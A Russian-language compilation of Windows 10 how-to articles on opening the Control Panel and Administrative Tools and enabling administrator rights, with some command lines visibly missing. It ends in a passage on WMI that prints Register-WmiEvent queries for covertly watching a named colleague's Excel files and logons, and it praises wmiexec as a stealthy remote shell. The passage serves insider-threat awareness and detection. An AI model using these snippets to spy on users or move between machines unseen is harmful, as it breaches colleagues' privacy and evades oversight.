Обзор. На панели управления можно выбирать различные категории (например, «Система и безопасность», «Программы» или «Специальные возможности») и просматривать часто используемые задачи для каждой категории. В разделе Просмотр можно выбрать категорию Крупные значки или Мелкие значки для просмотра списка всех элементов панели управления.
Советы:
-
Если вы просматриваете панель управления в виде значков, можно быстро найти элемент из списка, введя первую букву названия этого элемента. Например, чтобы найти элемент «Клавиатура», введите К, и первым в списке элементов на панели управления, название которого начинается с буквы «К», будет «Клавиатура».
-
Кроме того, для прокрутки списка значков панели управления можно использовать клавиши со стрелками (СТРЕЛКА ВВЕРХ, ВНИЗ, ВЛЕВО и ВПРАВО).
-
Если вы не можете найти параметр на панели управления, нажмите кнопку Пуск , > Параметры . Многие возможности панели управления теперь доступны в настройках .
Нужна дополнительная помощь?
В данной статье показаны действия, с помощью которых можно открыть «Средства администрирования Windows» в операционной системе Windows 10.
Администрирование — это папка в панели управления, содержащая средства для системных администраторов и опытных пользователей. Средства администрирования в папке могут отличаться в зависимости от используемой версии Windows.
Пример папки «Администрирование» показан на скриншоте ниже.
Содержание
- Средства администрирования в меню Пуск
- Открытие через Поиск
- Через панель управления
- Запуск через Проводник Windows
Средства администрирования в меню Пуск
Чтобы открыть «Средства администрирования Windows», откройте меню Пуск, в списке приложений в группе под буквой «С», найдите и разверните папку Служебные — Windows и выберите Средства администрирования Windows.
Также можно непосредственно из меню «Пуск» запустить необходимую утилиту из состава средств администрирования Windows, для этого откройте меню «Пуск», в списке приложений в группе под буквой «С», найдите и разверните папку Средства администрирования Windows и выберите необходимую утилиту.
Открытие через Поиск
Чтобы открыть «Средства администрирования Windows», используйте «Поиск в Windows», для этого нажмите на значок поиска в панели задач или нажмите сочетание клавиш + S, в строке поиска начните вводить администрирование и в результатах поиска выберите Средства администрирования Windows.
Через панель управления
Откройте классическую панель управления, в выпадающем списке Просмотр: выберите Мелкие значки и затем выберите пункт Администрирование.
Запуск через Проводник Windows
Откройте Проводник Windows и в адресную строку скопируйте и вставьте следующий путь:
%ProgramData%MicrosoftWindowsStart MenuProgramsAdministrative Tools
Используя рассмотренные выше действия, можно открыть «Средства администрирования Windows» в операционной системе Windows 10.
Содержание
- Инструменты Windows 10 для администрирования.
- Инструменты Windows 10. Что и как запустить?
- Панель инструментов администрирования.
- Редактор системного реестра.
- Панель управления Windows.
- Программы и компоненты
- Как открыть «Средства администрирования» в Windows 10
- Средства администрирования в меню Пуск
- Открытие через Поиск
- Через панель управления
- Запуск через Проводник Windows
- Получение прав администратора на Windows 10
- Получение прав администратора в Windows 10 через командную строку
- Метод использования групповой политики
- Использование утилиты «netplwiz»
- Как найти инструменты администрирования в Windows 10
- Найдите административные инструменты в Windows 10
- Ожидайте, что классические административные и системные утилиты продолжат развиваться в Windows 10
Инструменты Windows 10 для администрирования.
В операционной системе Windows любой версии всегда имелся широкий выбор инструментов администрирования. В этой статье мы с вами рассмотрим основные инструмент Windows 10, а точнее что, где и как запустить при необходимости.
Инструменты Windows 10. Что и как запустить?
При написании инструкций на этом сайте, мне часто приходится раз за разом, подробно расписывать шаги по запуску определённого встроенного инструмента администрирования Windows. Например запуск: диспетчера устройств, диспетчера задач, панели управления Windows, редактора реестра и так далее.
В этой публикации я хочу подробно расписать запуск основных инструментов и служб администрирования Windows, чтобы в дальнейшем, в последующих записях просто давать ссылку на этот материал. Возможно даже, что выведу ссылку на этот материал отдельно в меню либо в сайдбар сайта.
А теперь давайте начнём про сами инструменты администрирования Windows 10.
Панель инструментов администрирования.
С панели инструментов администрирования можно запустить большинство инструментов Windows. Открыть эту панель можно разными способами.
С панели инструментов администрирования Windows 10 можно запустить:
О том как запустить остальные инструменты и утилиты расскажу дальше.
Редактор системного реестра.
Как запустить редактор реестра? Его можно запустить несколькими способами.
Пожалуй этих двух способов запуска хватает. О том, что такое системный реестр я расскажу вам в отдельной статье.
Панель управления Windows.
В Windows 10 появилось новое меню настроек, которое называется Параметры. Это что то вроде панели управления, которое было в старых версиях ОС. Новое меню как раз призвано заменить классическую панель. Но классическая «Панель управления» имеет много настроек, которые можно менять только в ней, либо проще производить в ней. Поэтому важно знать как запускать классическую Панель управления на Windows 10.
Программы и компоненты
Это ещё одна классическая панель, с помощью которой можно и рекомендуется удалять программы и приложения (если конечно вы не используете сторонние программы для полного и правильного удаления приложений с Windows) с Windows. Как её запустить?
Источник
Как открыть «Средства администрирования» в Windows 10
В данной статье показаны действия, с помощью которых можно открыть «Средства администрирования Windows» в операционной системе Windows 10.
Администрирование — это папка в панели управления, содержащая средства для системных администраторов и опытных пользователей. Средства администрирования в папке могут отличаться в зависимости от используемой версии Windows.
Пример папки «Администрирование» показан на скриншоте ниже.
Средства администрирования в меню Пуск
Чтобы открыть «Средства администрирования Windows», откройте меню Пуск, в списке приложений в группе под буквой «С», найдите и разверните папку Служебные — Windows и выберите Средства администрирования Windows.
Также можно непосредственно из меню «Пуск» запустить необходимую утилиту из состава средств администрирования Windows, для этого откройте меню «Пуск», в списке приложений в группе под буквой «С», найдите и разверните папку Средства администрирования Windows и выберите необходимую утилиту.
Открытие через Поиск
Через панель управления
Откройте классическую панель управления, в выпадающем списке Просмотр: выберите Мелкие значки и затем выберите пункт Администрирование.
Запуск через Проводник Windows
Откройте Проводник Windows и в адресную строку скопируйте и вставьте следующий путь:
%ProgramData%MicrosoftWindowsStart MenuProgramsAdministrative Tools
Используя рассмотренные выше действия, можно открыть «Средства администрирования Windows» в операционной системе Windows 10.
Источник
Получение прав администратора на Windows 10
Обладать правами администратора требуется для того, чтобы во всем объеме использовать все необходимые возможности операционной системы Windows 10, а также, чтобы вносить различные важные изменения в нее. Данные права подразумевают доступ к расширенным функциям изменения и сохранения документов и материалов, а также использование определенных программ.
На сегодняшний день есть обширное количество способов для того, чтобы получить права администратора в операционной системе Windows 10. Давайте рассмотрим и запомним некоторые из них.
Получение прав администратора в Windows 10 через командную строку
Это один из самых простых и быстрых способов для получения учётной записи администратора. Нам потребуется ввести комбинацию клавиш «Win+R» и в поле «Выполнить» вводим комбинацию «cmd«.
Должна открыться командная строка, в которой необходимо ввести следующее:
После данной команды мы нажимаем клавишу «Enter».
Если высветилось сообщение, что имя не найдено, то необходимо ввести команду:
После этого выйдет полный список всех пользователей.
Необходимо отыскать имя администратора, который скрыт.
После чего необходимо повторить введение первой команды, только вводим не «administrator», а другое, правильное значение. Такая запись будет создана без пароля, но лучшим решением будет его создать и установить. Для этого вводим команду «net user администратор», где «администратор»- это наименование учётной записи.
Метод использования групповой политики
Утилита «secpol.msc» поможет в получении прав администратора. Удобный и быстрый вариант получить права администратора. Для этого потребуется запустить редактор командой «Win+R» и ввести «secpol.msc«.
Здесь необходимо отыскать раздел «Локальные политики» и далее «Параметры безопасности«.
Далее нужно выбрать «Учетные записи: Состояние учетной записи «Администратор»«.
Открываем этот параметр и ставим метку на пункт «Включен«, жмем «Применить» и «Ок«.
После всех выполненных операций необходимо перезагрузить всю систему.
Использование утилиты «netplwiz»
Для того, чтобы использовать утилиту «netplwiz», потребуется ввести комбинацию «Win+R» и в поле для ввода текста ввести:
Выберите нужную учетку и нажмите «Свойства».
В следующем окне переходим в раздел «Членство в группах«.
Ставим метку на «Администратор«, жмем «Применить«, затем «Ok«.
Перезагружаем свой компьютер.
Таким образом, мы уяснили, что получить права администратора можно и другими методами. Главное, чтобы вы смогли держать под контролем управление системой и конфиденциальную информацию на своем компьютере.
Источник
Как найти инструменты администрирования в Windows 10
С момента запуска Windows 10 в 2015 году Microsoft продолжала продвигать классические системные и административные инструменты и утилиты. Компания медленно, но методично пытается добавить эти инструменты в приложение «Настройки». Он также устарел или полностью удаляет некоторые классические инструменты. Мы показали вам, как найти классическую панель управления и другие классические инструменты. И сегодня мы покажем вам, как найти еще одну классику — Инструменты администрирования.
Найдите административные инструменты в Windows 10
Если вы используете Windows 10 20H2 или более раннюю версию, вы найдете «Администрирование» в меню «Пуск». Щелкните значок Кнопка Пуск или нажмите на Клавиша Windows на клавиатуре, чтобы запустить его.
Когда откроется меню «Пуск», вы найдете список установленных приложений в левом столбце в алфавитном порядке. Просто щелкните одну из букв в списке. Это упрощает поиск приложений и других элементов по первой букве. Щелкните значок W из появившегося меню букв.
Это подводит вас ко всему, что начинается с буквы «W.» Оттуда нажмите на Инструменты администрирования Windows папка.
Это расширит папку, содержащую инструменты и утилиты, такие как Disk Defrag, Hyper-V Manager, Event Viewer и другие.
В качестве альтернативы вы можете (по крайней мере, сейчас) нажать клавишу Windows и тип: админ и щелкните приложение «Инструменты администрирования Windows» в списке результатов поиска.
Это открывает папку, содержащую все административные инструменты, которые вы найдете в меню «Пуск».
Ожидайте, что классические административные и системные утилиты продолжат развиваться в Windows 10
Вещи будут продолжать двигаться. В будущих версиях Windows 10 папка «Администрирование» в меню «Пуск» больше не будет. Начиная с предварительной сборки 21354 Insider, Microsoft объявила, что меняет имя папки «Windows Administrative Tools» на просто «Windows Tools», чтобы лучше организовать административные и системные инструменты.
Вы сможете найти его, перейдя в Пуск> Инструменты Windows.
Это открывает папку Windows Tools, где вы найдете около 40 ярлыков для различных утилит администратора, таких как панель управления, средство записи шагов, средство просмотра событий, службы, планировщик задач и другие.
В будущем вы можете ожидать, что Microsoft продолжит добавлять классические утилиты в современное приложение «Настройки». Или просто замените, удалите или исключите другие. Поскольку классические утилиты и другие объекты продолжают развиваться, мы сделаем все возможное, чтобы помочь вам получить к ним доступ. Например, узнайте, как создать ярлык для открытия классической страницы «Система».
Источник
Всем привет! В нашем сегодняшнем уроке мы разбираем панель управления в Windows 10. Проблема в том, что разработчики её спрятали. Напомню, что в той же самой «семерке» она находилась сразу в меню «Пуск». Также из последних обновлений её убрали из дополнительного меню, которое вызывается через + X. Сегодня я расскажу, как найти, открыть панель и закрепить её на рабочем столе или на панели задач.
Содержание
- Способ 1: Быстрые клавиши
- Способ 2: Через поиск
- Способ 3: Запуск через пуск и настройка отображения на рабочем столе
- Способ 4: Создание ярлыка
- Способ 5: Через командную строку
- Способ 6: Прямой запуск
- Способ 7: Через вспомогательное меню
- Задать вопрос автору статьи
Способ 1: Быстрые клавиши
Лично я пользуюсь этим вариантом, на мой взгляд он самый быстрый. Находим на клавиатуре две клавиши и нажимаем на них одновременно:
+ R
Вылезет окошко «Выполнить». Чтобы зайти в панель достаточно ввести команду:
control
В конце не забудьте нажать «ОК».
Способ 2: Через поиск
Если вы хотите что-то найти, но забыли, или не знаете, где это находится, то проще всего воспользоваться поисковой строкой Windows. Она находится в левом нижнем углу экрана, чуть правее кнопки «Пуск». Нажимаем по значку лупы (если строки нет) и вводим «Панель управления», после этого напротив нужного варианта жмем «Открыть».
ПРИМЕЧАНИЕ! Можете попробовать ввести команду «control» – она тоже работает.
Способ 3: Запуск через пуск и настройка отображения на рабочем столе
Если в Windows 7 панелька находилась сразу в меню «Пуск», то в «десятке» её достаточно серьезно спрятали. Откройте «Пуск», пролистайте до русской буквы «С» и раскройте папку «Служебные – Windows». Здесь и будет «Панель управления». Чтобы в неё зайти, кликните на неё два раза. Если вы постоянно с ней работаете, то вам лучше вывести её в более удобное место, чтобы постоянно сюда не лазать.
Для этого кликните правой кнопкой и закрепите её на начальном экране (или рабочем столе), или на панели задач (та нижняя строчка с ярлыками всех программ.)
Есть и второй вариант включить её на рабочем столе – для этого кликаем правой кнопкой мыши по пустому месту рабочего стола и заходим в «Персонализацию».
Слева выбираем раздел «Темы» и находим в «Сопутствующих параметрах» – «Параметры значков рабочего стола».
Ставим нужную галочку и жмем «Применить», «ОК».
Способ 4: Создание ярлыка
Прошлый способ создает некую кнопку, но можно закрепить на рабочем столе обычный ярлык. В чем же отличие этого варианта? На самом деле только в том, что, с точки зрения операционной системы в данном случае вы создаете ярлык (или ссылку) самостоятельно вручную, а там это делает сама винда, когда вы меняете настройку отображения.
- Аналогично, как и в прошлой главе, вызовите дополнительное меню рабочего стола, кликнув по свободному месту правой кнопкой мыши. После этого выбираем «Создать» – «Ярлык».
- Вписываем нашу любимую команду:
control
- Вписываем название.
- Жмем «Готово».
Способ 5: Через командную строку
Открываем командную строку или «PowerShell» и вводим команду:
start control
Если вы не знаете, как запустить консоль, то читаем эту инструкцию.
Способ 6: Прямой запуск
Во всех прошлых главах мы делали запуск панельки, через (так сказать) посредников. А давайте посмотрим, где же находится сам файл панели управления, и как её запустить напрямую. А находится утилита в папке:
C:WindowsSystem32
Теперь вы можете догадаться, что все команды через консоль или окно «Выполнить» просто запускают системные программы, которые чаще всего находятся именно в папке «System 32». Тут же находится и консоль (cmd), Power Shell и многое другое.
Способ 7: Через вспомогательное меню
Раньше я часто использовал именно данный вариант, так как он был наиболее удобным для меня. Нажмите одновременно на клавиши + X, или кликните правой кнопкой мыши по кнопке «Пуск» – чтобы вызывать вспомогательное меню.
Если у вас старая версия Windows, то «Панель управления» будет находиться ниже «Диспетчера устройств». Если вы постоянно обновляете ОС, то вместо неё будут «Параметры». Странно, что разработчики выпилили её оттуда. Неужели в новой Windows 11 вообще её не будет?
Панель управления в Windows 10 — где находится, вход и настройка
Содержание:
- Панель управления в Windows 10
- Основные функции
- Как открыть панель управления: способы
- Через «Пуск»
- ЛКМ по иконке
- Папка «Служебные» — «Windows»
- Панель управления
- Через строку «Выполнить»
- Вызвать строку с помощью «Win + R»
- Написать в строке «ControlPanel»
- С помощью системного поиска
- В панели задач
- Ввести название и выбрать необходимое в подсказке
- Через контекстное меню
- ПКМ по иконке Пуск или комбинация «Win + X»
- Панель управления
- Через «Пуск»
- Создать ярлык на рабочем столе
- ПКМ по свободному полю на рабочем столе
- Выбрать и перейти в персонализацию
- «Темы» — «Параметры значков рабочего стола»
- Значки рабочего стола
Панель управления в Windows 10 — одна из самых функциональных опций на персональном компьютере. Благодаря настройкам можно легко управлять безопасностью, Интернетом, звуком, программами и многими другими функциями. В последней версии Windows многие пользователи отмечают, что эта функция пропала из основного меню «Пуск». В действительности она сохранилась на своем месте, ее можно отыскать с помощью конкретных папок или через поисковик.
Панель управления в Windows 10
Многие часто спрашивают, как открыть панель задач на Виндовс 10. В старых версиях такая функция присутствовала в виде стандартной кнопки. Здесь она отсутствует, но месторасположение основной папки сохранилось. Для этого выполняют следующие последовательные действия:
- Выбирают клавишу «Пуск», расположенную в нижнем левом углу, кликают левой кнопкой.
- Выбирают папку «Служебные программы», после чего чуть ниже открывают новые функции и настройки.
- Переходят в нужный раздел.
Открытие панели задач в Виндовс 10
Важно! Выбранная папка открывается отдельно. В ней должны находиться настройки параметров компьютера. С ними следует быть осторожными, чтобы не сбить системные данные, которые будет сложно вернуть.
Основные функции
Выделяют следующие основные функции, расположенные в настройках приложения:
- «Система и безопасность». В данном разделе проверяют наличие опасности для компьютера (вирусы и вредоносные программы). Делают резервные копии важных файлов. Можно запустить восстановление удаленных данных;
- «Сеть и Интернет». Настраивают подключение к проводной или беспроводной сети, устраняют неполадки;
- «Оборудование и звук». Настраивают вспомогательные устройства в виде мыши, клавиатуры, принтера, сканера. Улучшают яркость экрана, меняют громкость или делают режим без звука. Проверяют остаток батареи;
- «Программы». В разделе их можно устанавливать или удалять;
- «Учетные записи пользователей». Меняют доступ, который получают новые пользователи. Они делятся на администратора, стандартного и гостя;
- «Оформление и персонализация». Просматривают навигацию по компьютеру. Настраивают специальные возможности для людей с плохим зрением и другими отклонениями в состоянии здоровья. Меняют шрифт на удобный для пользователя;
- «Часы и регион». Меняют дату и время, подходящую под определенный часовой пояс. На новых компьютерах настройка может происходить в автоматическом режиме;
- «Специальные возможности». Меняют параметры вспомогательных инструментов для использования ПК. Настраивают распознавание речи.
К сведению! Панель управления Windows 10 — многофункциональное устройство. Благодаря ей можно изменить основные настройки на персональном компьютере или ноутбуке. Для многих пользователей может покататься, что это слишком сложно. Но если следовать правилам, последовательность поймет даже новичок.
Как открыть панель управления: способы
Каждый пользователь может открыть настройки панели методом, который ему удобен. Также возможно закрепление папки в панели инструментов или на рабочем столе. Чтобы сделать это, выполняют ряд последовательных действий.
Через «Пуск»
Это простейший метод, благодаря которому пользователь быстро попадет в нужный раздел. Такой способ подходит для тех, кто пользуется функцией редко.
Обратите внимание! Если же требуется ежедневно заходить туда, можно закрепить значок на рабочем столе.
ЛКМ по иконке
По меню «Пуск» кликают 1 раз левой кнопкой мыши. Появится список действий, который может совершить пользователь. Прокручивают их в самый низ, выбирая папку «Служебные».
Папка «Служебные» — «Windows»
Когда пользователь кликнет на вкладку «Служебные», возникнет дополнительный раздел. В нем ищут опцию требующейся панели.
Панель управления
После выбора панели появится новое меню, где можно менять основные настройки параметров компьютера. Когда нужные действия выполнены, нажимают на крестик.
Через строку «Выполнить»
Командная строка — это один из основных методов, благодаря которым можно открывать любые разделы, содержащиеся на персональном компьютере или ноутбуке. Это своеобразная поисковая система. Чтобы ею воспользоваться, нужно знать команды на английском языке, которые открывают папки и файлы в компьютере.
Вызвать строку с помощью «Win + R»
Нажимают сочетание кнопок «Win + R». Перед пользователем появится командная строка «Выполнить». В графе «Открыть» печатают «Control» или «ControlPanel». Если первое значение не работает, набирают второе.
Написать в строке «ControlPanel»
После введения «Control» или «ControlPanel», кликают на «Ok». Благодаря этому способу перед пользователем сразу же откроется меню настроек панели управления.
Обратите внимание! Никаких больше действий совершать не нужно.
Сочетание кнопок «Win + R»
С помощью системного поиска
Поисковая функция — одна из опций, которую создатели операционной системы Windows 10 вынесли в основную строку внизу экрана. Ее вызов в виде лупы или строки, где печатают требуемое значение.
В панели задач
Когда кликают на лупу, открывается строка для ввода данных. Требуется прописать наименование нужного раздела. Когда пользователь сделает это, перед ним появятся все элементы, которые нашел поиск.
Обратите внимание! В графе «Лучшее соответствие» находят приложение с нужным названием. При этом снизу должна содержаться подпись «Классическое приложение».
Ввести название и выбрать необходимое в подсказке
Когда подсказка выдала требующееся наименование, по ней кликают левой кнопкой мыши. Этого достаточно, чтобы перед пользователем открылся инструмент, через который проводят настройки компьютера.
Через контекстное меню
Многие пользователи думают, что контекстное меню возникает только в том случае, если кликнуть по основному экрану. Однако опция доступна для разных строк, папок, содержащихся на компьютере. Этот прием используют и к меню «Пуск», чтобы выбрать программы и приложения.
ПКМ по иконке Пуск или комбинация «Win + X»
Если требуется найти панель для настроек, нужно нажать на клавишу «Пуск». Вместо этого пользователь может зажать горячие клавиши «Win + X». Таким способом открывают контекстное меню, где выполняют дальнейшие действия.
Панель управления
После появления контекстного меню требуется выбрать нужное название настроек. Кликают по панели управления, входят в ее настройки. Многие пользователи отмечают, что в Windows 10 в контекстном меню такая опция отсутствует. Тогда можно воспользоваться возможностями Windows PowerShell.
Если использовать основное меню через поиск, открыть приложение можно несколькими способами.
- кликают правой кнопкой по меню «Пуск». В контекстном меню выбирают Windows PowerShell. Кликают по нему левой кнопкой, после чего требуется ввести команду «Control», нажимают «Enter»;
- нажимают на кнопку «Пуск», после чего одновременно используют кнопки «Win + I». Далее выбирают «Панель персонализации». В появившемся меню нажимают на «Темы», а далее «Параметры значков рабочего стола». Сбоку появится новое меню, где можно поставить галочки на тех настройках, которые будут отображаться на главном экране. Ставят галочку на значении «Панель управления», после этого кликают на «Применить», чтобы сохранить изменения. После нажатия на «Ok» на рабочем столе появится отдельная папка с настройками панели управления.
В Windows PowerShell тоже можно осуществлять основные настройки
Обратите внимание! Если пользователь ежедневно открывает данную панель, лучше установить ее на рабочем столе или в основной строке. Тогда для перехода не потребуются горячие клавиши, раздел будет всегда перед глазами.
Создать ярлык на рабочем столе
Проще сразу создать ярлык на рабочем столе, чем каждый раз искать приложение в настройках компьютера. Это делается просто, понадобится лишь кликнуть по свободному полю рабочего стола и выбрать «Персонализация».
ПКМ по свободному полю на рабочем столе
Если нажать правой кнопкой мыши по свободной зоне рабочего стола, возникнет контекстное меню. В нем просматривают пункты, которые можно открыть. Переходят в самый нижний раздел, нажимая на «Персонализация».
Переход в раздел «Персонализация»
Выбрать и перейти в персонализацию
Когда пользователь кликнет по «Персонализация», он попадет в отдельное меню настроек. Там можно изменить фон, цвета, экран блокировки, тему, шрифты. Там же содержатся «Пуск» и «Панель задач». Потребуется только раздел «Темы».
Меню раздела «Персонализация»
«Темы» — «Параметры значков рабочего стола»
Кликнув на пункт «Темы», возникнет другое меню. Смотрят на правую сторону, там содержатся «Сопутствующие параметры». Выбирают раздел «Параметры значков рабочего стола». Появятся дополнительные параметры, где проводят остальные действия.
Значки рабочего стола
В появившемся меню содержатся значки рабочего стола. Галочкой отмечены те папки и файлы, которые уже есть в наличии. Нужно поставить галочку в квадратике с нужным названием.
Чтобы сохранить получившиеся изменения, нажимают на «Применить». Если она не будет отмечена, на рабочем столе не появится дополнительный ярлык. Затем нажимают на «Ok», смотрят на рабочий стол.
Появившийся контрольный ярлык не обязательно называть идентично. Можно использовать иное наименование, удобное пользователю
Обратите внимание! Папка для управления уже есть в компьютере, на рабочий стол перемещают только ее ярлык. Поэтому выходить из системы для обновления опций не нужно.
Сохранение панели управления на основном экране
Описанное в статье приложение содержит множество функций для операционной системы Windows 10, компьютера пользователя. Для перехода в этот раздел есть много способов. Для каждого из них предусмотрены действия, которые требуется выполнить, чтобы зайти в приложение. Если пользователь каждый раз открывает раздел, рекомендуется установить ярлык на рабочем столе или в панели задач, тогда переход значительно упростится до 1 клика.
Инструментарий управления Windows (WMI) — это подсистема PowerShell, которая обеспечивает администраторам доступ к мощным инструментам системного мониторинга. Этот инструментарий задумывался как быстрое и эффективное средство системного администрирования, однако далеко не все используют его с благими целями: с его помощью злоумышленники-инсайдеры могут шпионить за другими сотрудниками. Знание этой уязвимости WMI ощутимым образом упрощает обнаружение внутренних угроз и борьбу с ними.
В этой статье мы рассмотрим, что такое инструментарий WMI, для чего он нужен и как его можно использовать для отслеживания инсайдерской деятельности в системе. Мы также составили более подробное руководство, посвященное событиям WMI и инсайдерскому шпионажу, которое вы можете скачать бесплатно.
Краткий обзор: что такое WMI и для чего он нужен?
Приведем конкретный пример. С помощью WMI вы можете запросить, например, все большие файлы Excel, находящиеся в том или ином каталоге, а затем получать уведомление каждый раз при создании файла с заданным размером, например 1 Мб. Командлет Register-WmiEvent позволяет сделать все это с помощью одной не слишком сложной строки в PowerShell.
В хороших руках WMI может послужить многим благим целям, но точно так же он может стать инструментом вредоносной инсайдерской деятельности. Можно легко представить, как некий сотрудник с повадками Эдварда Сноудена использует WMI, чтобы шпионить за своими коллегами. Для этого ему даже не понадобятся особые технические знания.
Предположим, наш гипотетический инсайдер «случайно» подсмотрел, что его коллега Лекс периодически скачивает большие файлы Excel, содержащие номера социального страхования и другие личные данные клиентов. В этом случае наш незаметный инсайдер может соорудить нечто подобное:
Register-WmiEvent -Query "SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance isa 'CIM_DataFile' and TargetInstance.FileSize > 2000000 and TargetInstance.Path = '\Users\lex\Important' and targetInstance.Drive = 'C:’ and targetInstance.Extension =’xlsx’” -Action $action
Этот код запрашивает объект CIM_DataFile для получения доступа к информации о создании файла Excel в указанном каталоге, а затем запускает выполнение блока сценария. Ближе к концу этой статьи мы рассмотрим подробнее, как может выглядеть этот блок сценария в случае с нашим гипотетическим инсайдером.
Для чего используется инструментарий управления Windows
Прежде чем мы перейдем к изучению того, как WMI может использоваться инсайдерами в целях отслеживания, стоит отметить, что у него есть множество законных применений. Глобальное предназначение этой системы — свести воедино все средства управления устройствами и приложениями в корпоративных сетях. Таким образом, WMI может использоваться:
- для сбора информации о статусе локальных и удаленных компьютерных систем
- настройки параметров безопасности для удаленных компьютеров и приложений
- настройки и редактирования свойств системы
- настройки и редактирования разрешений для авторизованных пользователей и групп
- выполнения кода и сериализации объектов (своеобразный «SSH на стероидах»)
- назначения и редактирования меток дисков
- создания графика выполнения процессов
- резервного копирования репозиториев объектов
- включения и отключения регистрации ошибок
Доступ ко всем этим функциям можно получить с помощью PowerShell и WMIC — интерфейса командной строки WMI. Как видите, у WMI есть самые разные применения, и эта система позволяет отслеживать и редактировать множество разнообразных параметров в компьютерной сети.
Архитектура инструментария управления Windows
Инструментарий WMI является частью операционной системы Windows, и он предварительно установлен на всех операционных системах, начиная с Windows 2000. WMI состоит из следующих компонентов:
- Служба WMI — это реализация системы WMI в Windows. Этот процесс отображается под именем «Инструментарий управления Windows» и является связующим звеном между поставщиками WMI, репозиторием WMI и управляющими приложениями. Данный процесс запускается автоматически при включении компьютера.
- Управляемые объекты — это любые логические или физические компоненты либо службы, которыми можно управлять с помощью WMI. К таким объектам могут относиться самые разные компоненты, поскольку WMI может получить доступ к любому параметру или объекту, к которым имеют доступ другие инструменты Windows, такие как системный монитор.
- Поставщики WMI — это объекты, которые отслеживают события и данные конкретного объекта. Существует множество различных типов поставщиков WMI как общего назначения, так и предназначенных для конкретных устройств. Многие из них предварительно встроены в систему Windows.
- Классы используются поставщиками WMI для передачи данных службам WMI. В классах содержатся события и свойства, позволяющие получать и настраивать данные. Системные классы WMI предварительно определены и начинаются с двойного подчеркивания.
- Методы, будучи привязанными к конкретным классам, позволяют выполнять действия на основе имеющихся в них данных. Например, методы можно использовать для запуска и завершения процессов на удаленных компьютерах. Доступ к методам можно получить с помощью приложений для обработки сценариев или сетевого администрирования.
- Репозиторий WMI — это база данных, в которой хранятся все статические данные, связанные с WMI. Динамические данные не хранятся в репозитории. Доступ к ним можно получить через класс поставщика WMI.
- Диспетчер объектов CMI — это система, которая находится между управляющим приложением и поставщиками WMI. Она запрашивает данные у этих поставщиков и затем передает их приложению.
- API WMI выполняет эти операции и предоставляет приложениям доступ к инфраструктуре WMI без привязки к типу используемого устройства.
- Потребитель WMI — это сущность, которая отправляет запросы объектам через диспетчер объектов. Обычно потребитель WMI является приложением для мониторинга, таким как PRTG Network Monitor, управляющим приложением или сценарием PowerShell.
Выполнение запросов WMI
Самым простым способом выполнения запроса WMI является запуск WMIC в стандартной командной строке Windows. Выполните следующие действия, чтобы получить информацию о процессоре, используемом на локальном компьютере:
- Откройте командную строку
- Введите WMIC для вызова программы и нажмите клавишу Enter
- Появится окно командной строки WMIC
- В командной строке можно выполнять запросы WMI. Самый простой запрос — это просмотр информации о локальном процессоре, который можно выполнить с помощью следующей команды:
WMIC CPU
- Результаты будут отображены в командной строке
Практически все команды, которые будут рассмотрены ниже, выполняются таким образом. Однако WMI позволяет получать гораздо более подробную информацию, чем сведения о процессоре, и в том числе от удаленных компьютеров и приложений.
Практикум по использованию событий WMI для наблюдения за системой
В этом разделе мы рассмотрим, как с помощью WMI выполнять команды и отслеживать процессы на удаленных компьютерах. Подобные приемы можно использовать в составе системы анализа поведения пользователей и сущностей (UEBA) для автоматического мониторинга процессов во всей системе и проверки на инсайдерские угрозы, о которых свидетельствуют подозрительное поведение или аномальные события.
Использование функциональности wmiexec из Impacket
В WMI можно выполнять разные функции, помимо управления событиями. В нем можно запускать процессы и выполнять команды в окнах Windows как на локальных, так и на удаленных компьютерах. Ради интереса попробуйте ввести команду wmic process call create ‘notepad.exe’ в сеансе PowerShell, чтобы открыть старый текстовый редактор Microsoft. При этом используется замечательный инструмент командной строки wmic, входящий в состав WMI. Здорово, правда?
Если бы я добавил параметр /Node:, а затем имя удаленного компьютера Windows, то смог бы запустить Блокнот на нем, при условии что у меня есть соответствующие разрешения. Совершенно ясно, что на практическом уровне wmic является незаменимым помощником для системных администраторов.
Прежде чем вы начнете возмущаться: я знаю, что существуют эквивалентные командлеты PowerShell. Однако я считаю, что синтаксис wmic легче запомнить.
Было бы здорово, если бы я мог с помощью WMI создать простую и незаметную псевдооболочку.
Скрытая псевдооболочка, созданная с помощью wmiexec
К моему везению, это можно сделать в Impacket. В тестовой среде Amazon я использовал свой любимый wmiexec для доступа к WMI через виртуальную машину Linux. В wmiexec предусмотрена возможность создания псевдооболочки: каждый раз, когда на стороне клиента вводится команда, на целевом компьютере создается отдельная оболочка для выполнения этой команды.
И в psexec, и в smbexec для запуска команд в удаленной системе используются службы Windows. Работа smbexec протекает незаметнее, так как он быстро создает, а затем удаляет службу, а psexec, наоборот, оставляет ее на виду.
Инструмент wmiexec напрямую запускает cmd.exe для удаленного выполнения команды. Созданную команду можно найти в средстве просмотра событий. Обратите внимание, что мы избежали привлекающих внимание служб Windows
Инструмент wmiexec абсолютно не затрагивает службы, вместо этого используя описанные выше возможности WMI для непосредственного запуска процесса. При поиске возможных источников угроз специалисты по безопасности редко начинают с WMI, в то время как службы обычно являются хорошим местом для начала поиска улик, указывающих на атаку. Хороший ход, wmiexec!
Использование событий WMI для наблюдения за пользователями
Пока я тешил себя мыслью, что я один такой умный и занимаюсь экспериментами с WMI, оказалось, что ребята, занимающиеся тестами на проникновение, уже давно поняли, как все работает. Вам обязательно нужно прочитать потрясающую презентацию Мэтта Грэбера (Matt Graeber) с конференции Black Hat 2015 года, где он рассказывает, как злоумышленники могут превратить WMI и весь его арсенал для работы с событиями в инструмент для взломов.
В моей истории я представляю себе инсайдера а-ля Сноуден, который обладает некоторыми техническими знаниями, но не глубокой хакерской мудростью, и которому доверяют другие сотрудники. Этому человеку не нужно знать все про WMI. Ему нужно знать только то, что требуется для работы на удаленном компьютере и инициирования событий.
Помимо файловых объектов, есть еще один интересный класс объектов, который можно изучить с помощью WMI, — win32_LogOnSession. Запрос этого базового объекта Windows позволяет найти пользователей, которые в данный момент находятся в системе. Затем можно использовать блок сценария действий Register-WmiEvent для запуска сценария PowerShell при удаленном входе нового пользователя в систему. Уловили суть? Злоумышленник может получать уведомления каждый раз, когда пользователь, за которым он следит, входит в целевую систему.
Вот что я набросал:
Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" –Action $action
